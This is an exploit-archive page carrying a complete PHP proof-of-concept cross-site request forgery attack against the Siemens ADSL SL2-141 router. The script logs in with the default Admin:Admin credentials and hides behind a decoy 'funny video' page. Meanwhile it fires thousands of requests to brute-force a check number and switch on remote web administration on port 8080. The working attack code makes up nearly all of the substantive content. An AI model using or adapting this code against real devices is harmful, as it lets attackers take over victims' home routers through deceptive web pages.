exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Siemens ADSL SL2-141 XSRF Exploit

Siemens ADSL SL2-141 XSRF Exploit
Posted Jan 26, 2009
Authored by spdr

Siemens ADSL SL2-141 router cross site request forgery exploit.

tags | exploit, csrf
SHA-256 | 1e8710fbc1f710587db3f4c4d4a65ea17ae6a3b6a87f5f789aaa7781a7ffdce0

Siemens ADSL SL2-141 XSRF Exploit

Change Mirror Download
<?php

/*

================================================
|| Siemens ADSL SL2-141 (Router) CSRF Exploit ||
================================================

- Successful attacks will allow remote access to the router over the internet.
- Will Bruteforce the random security number, could possibly be calculated...
- Uses default login, could use a dictionary too.
- PoC only, there are much more effective ways of doing this ;-)

========================================================================
[+] Visit us at http://www.binaryvision.org.il/ for more information [+]
========================================================================

*/

$ip = (getenv(HTTP_X_FORWARDED_FOR))? getenv(HTTP_X_FORWARDED_FOR): getenv(REMOTE_ADDR); // local computers can use the remote address to login (!).
echo "<img src='http://Admin:Admin@$ip/'></img>"; // Uses the default login to auth (Admin:Admin), could use a dictionary instead.

// Just some stuff to keep the user busy, aka Rickroll
$mystr="<html><head><title>Unbelivable movie</title></head><center><script>function siera() {var bullshit='<center><h1>Possibly the funniest video on the web</h1><object classid=\"clsid:d27cdb6e-ae6d-11cf-96b8-444553540000\" codebase=\"http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0\" width=\"800\" height=\"600\" id=\"movie\"> <param name=\"movie\" value=\"http://llnw.static.cbslocal.com/Themes/CBS/_resources/swf/vindex.swf\" /> <param name=\"quality\" value=\"high\" /> <param name=\"bgcolor\" value=\"#003366\" /> <embed src=\"http://llnw.static.cbslocal.com/Themes/CBS/_resources/swf/vindex.swf\" quality=\"high\" bgcolor=\"#ffffff\" width=\"800\" height=\"600\" name=\"mymoviename\" align=\"\" type=\"application/x-shockwave-flash\" pluginspage=\"http://www.macromedia.com/go/getflashplayer\"> </embed> </object><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>';
document.write(bullshit);

// "Random number" bruteforce ... too lazy to write js :-)
var buff = '';
for(i=1;i<=11000;i++) { buff+=\"<img src='http://$ip/accessremote.cgi?checkNum=\"+i+\"&remoteservice=pppoe_8_48_1&enblremoteWeb=1&remotewebPort=8080'></img>\"; }
document.write(buff);
}
</script><body onload='siera()'></body>";

echo $mystr; // Throw it all on the html page
?>



Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close